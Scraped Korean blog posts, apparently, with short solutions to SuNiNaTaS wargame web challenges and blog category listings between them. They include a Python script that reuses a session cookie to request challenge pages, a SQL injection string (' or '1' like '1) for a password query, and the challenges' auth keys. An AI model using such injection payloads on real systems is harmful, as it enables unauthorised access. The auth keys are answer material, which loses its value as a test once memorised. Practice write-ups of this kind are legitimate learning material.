import urllib, urllib2

url = "http://suninatas.com/Part_one/web07/web07.asp"
url2 = "http://suninatas.com/Part_one/web07/web07_1.asp"

header = {'Cookie': "ASPSESSIONIDCCRBCADD=FMCHFPOCKMPIDIOPDCBFBLCE"}

req = urllib2.Request(url, headers=header)

res = urllib2.urlopen(req).read()
req1 = urllib2.Request(url2, headers=header)
res = urllib2.urlopen(req1).read()
print res

'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web22번  (0) 2017.03.07
SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07

README 글 비밀번호 쿼리

"select szPwd from T_Web13 where nIdx = '3' and szPwd = '"&pwd&"'"

sqli -> ' or '1' like '1

authkey = suninatastopofworld!

md5(authkey) = 65038b0559e459420aa2d23093d01e4a


쿠키에 입력





Rome's First Emperor를 구글링

auth key = Augustus


'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web08번  (0) 2017.03.07
SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web05번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07
SuNiNaTaS web03번  (0) 2017.03.07

<!--Hint : 12342046413275659 -->


eval 함수 -> alert 변경



'Wargame > SuNiNaTaS' 카테고리의 다른 글

SuNiNaTaS web07번  (0) 2017.03.07
SuNiNaTaS web06번  (0) 2017.03.07
SuNiNaTaS web04번  (0) 2017.03.07
SuNiNaTaS web03번  (0) 2017.03.07
SuNiNaTaS web02번  (0) 2017.03.07

+ Recent posts

티스토리툴바